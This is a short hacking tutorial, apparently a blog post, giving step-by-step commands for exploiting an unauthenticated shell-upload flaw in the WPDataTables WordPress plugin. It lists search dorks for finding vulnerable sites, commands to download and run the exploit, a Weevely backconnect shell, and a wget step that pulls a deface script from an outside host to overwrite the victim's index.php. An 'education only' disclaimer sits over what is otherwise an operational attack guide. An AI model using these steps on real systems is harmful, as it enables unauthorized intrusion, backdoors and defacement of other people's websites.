Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.
Uploading Shell
Requirement:
1-Python Any Version (v2.7 recommended)
2-Exploit Script
3-Backdoor
Steps:
1- Download Exploit
wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
2- Change to executable Python extension
mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
3- Find Vulnerable Target using dork
inurl:/plugins/wpdatatables
inurl:codecanyon-3958969
index of "wpdatatables"
index of "codecanyon-3958969"
4- Open cmd/terminal and run exploit wptable.py
python wpdatatables_shell_up.py -t targetsite.com -f shell.php
5- Shell Upload to
http://targetsite.com/wp-content/YEAR/MONTH/shell.php
Bypassing Not Acceptable:-
Requirements:
1- Weevely Stealth Shell
2- Remote Deface Script (.txt)
Steps:
1- Upload weevely stealth shell using the exploit script
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
1- Weevely Stealth Shell
2- Remote Deface Script (.txt)
Steps:
1- Upload weevely stealth shell using the exploit script
2- Backconnect using weevely
3- CD to root directory
4- Backup index.php
mv index.php indexBAK.php
5- Import Deface Script
wget http://yourhosting.com/index.txt -O index.php
0 komentar